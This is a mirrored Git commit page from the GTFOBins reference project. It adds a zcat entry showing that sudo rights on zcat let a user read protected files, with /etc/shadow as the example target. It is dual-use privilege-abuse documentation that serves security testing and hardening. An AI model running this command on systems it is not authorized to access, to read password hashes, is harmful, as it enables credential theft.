mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-25 14:30:07 +01:00
GTFOBINS: Added zcat
This commit is contained in:
parent
61314d55d0
commit
e2b50542f0
7
_gtfobins/zcat.md
Normal file
7
_gtfobins/zcat.md
Normal file
@ -0,0 +1,7 @@
|
|||||||
|
---
|
||||||
|
functions:
|
||||||
|
sudo:
|
||||||
|
- code: |
|
||||||
|
LFILE="/etc/shadow" # or any other file
|
||||||
|
sudo zcat -f "$LFILE"
|
||||||
|
---
|
Loading…
Reference in New Issue
Block a user